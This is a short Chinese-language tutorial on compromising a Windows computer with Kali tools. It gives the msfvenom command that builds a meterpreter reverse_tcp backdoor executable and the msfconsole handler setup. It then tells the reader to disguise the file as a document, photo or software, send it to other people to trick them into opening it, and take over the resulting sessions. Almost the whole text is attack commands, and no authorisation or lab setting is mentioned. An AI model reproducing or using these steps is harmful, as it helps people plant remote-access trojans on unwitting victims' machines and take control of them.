利用kali下的msfvenom入侵电脑

需要的工具：msfvenom . msfconsole (kali里面有)

msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe

即生成一个后门文件xss.exe(我这里是将文件名命名为xss的)

然后继续执行命令：

msfconsole          (运行msfconsole)

msf>use exploit/multi/handler  (选择模块)

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

set lhost  加ip地址       set lport 加端口号

 

msf exploit(handler) > exploit  -z  -j （后台执行）

这样木马就配置好了，然后发给别人（可以伪造成文档,照片,软件等文件骗取别人打开）

发给别人后，等待别人打开xss.exe,打开即上钩了

msf exploit(handler) > sessions（查看上钩的用户）

msf exploit(handler) > sessions -i 1（选择需要攻击的用户，这里选择第 1 个）

进入meterpreter了，即可进行一些相关的木马操作。